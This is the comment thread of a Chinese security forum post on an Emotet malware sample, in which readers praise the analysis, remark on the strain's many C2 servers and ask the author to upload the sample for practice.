顾何 感谢分享~ 这应该是Emotet比较新的版本,上周我这边也看到了很多相同结构的,比较活跃。 分析的很详细,支持一下~ 顺便,如果方便,下次可以将分析的样本打包上传到论坛,提供给想学习的读者练习。 ...
下次会打包一下,第一次发还不太熟悉
雪    币: 3922
活跃值: 活跃值 (245)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
如斯咩咩咩 活跃值 2020-9-21 12:03
5
0
源哥牛批
雪    币: 4311
活跃值: 活跃值 (1229)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
pureGavin 活跃值 2020-9-21 12:19
6
0
L0x1c 下次会打包一下[em_13],第一次发还不太熟悉
mark,在编辑帖子界面可以补发病毒样本
雪    币: 1558
活跃值: 活跃值 (1033)
能力值: ( LV6,RANK:87 )
在线值:
发帖
回帖
粉丝
L0x1c 活跃值 1 2020-9-21 12:21
7
0
pureGavin mark,在编辑帖子界面可以补发病毒样本
get!
雪    币: 1558
活跃值: 活跃值 (1033)
能力值: ( LV6,RANK:87 )
在线值:
发帖
回帖
粉丝
L0x1c 活跃值 1 2020-9-21 12:22
8
0
如斯咩咩咩 源哥牛批
二木哥 流弊!
雪    币: 172
活跃值: 活跃值 (1200)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
不懂就不懂 活跃值 1 2020-9-21 14:02
9
0

原来这又是Emotet,只把宏看了一下,没去看下载的Emotet,多谢。

最后于 2020-9-23 12:13 被不懂就不懂编辑 ,原因:
雪    币: 1230
活跃值: 活跃值 (254)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
provence 活跃值 2020-9-22 16:15
10
0
源哥 永远的神!
雪    币: 2099
活跃值: 活跃值 (310)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
VirtualCC 活跃值 2020-9-22 16:27
11
0
provence 源哥 永远的神!
+1
雪    币: 1
活跃值: 活跃值 (22)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
posidelaijie 活跃值 2020-9-23 10:47
12
0
求样本
雪    币: 40
活跃值: 活跃值 (57)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
xiaozuzhi 活跃值 2020-9-25 18:19
13
1
这种 它的C2超多,循环发包你可以看看
雪    币: 460
活跃值: 活跃值 (30)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
RNGorgeous 活跃值 2020-10-12 11:36
14
0
求样本啊大佬
游客
登录 | 注册 方可回帖
返回